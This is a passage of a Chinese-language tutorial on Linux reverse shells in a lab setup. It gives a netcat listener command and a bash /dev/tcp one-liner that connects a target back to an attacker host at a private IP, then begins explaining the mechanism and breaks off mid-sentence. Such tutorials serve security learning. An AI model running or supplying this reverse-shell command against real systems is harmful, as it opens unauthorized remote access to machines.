目录食用
Linux反弹shell
攻击机:192.168.41.142
靶机:192.168.41.138
bash反弹
Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,也就是比如 vim、passwd 命令不能用。
先在攻击机开启监听:nc -lvp 4444
然后在靶机反弹:bash -i >& /dev/tcp/192.168.41.142/4444 0>&1
命令原理:bash -i 是打开一个交互式的bash终端。/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。所以,不难理解,/dev/tcp/192.168.41.142/4444 这条命令是意思就是和192.168.41.142主机的4444端口建立一个socket连接。通过查阅资料,发现 >& 和 &> 两者一个意思,都是将标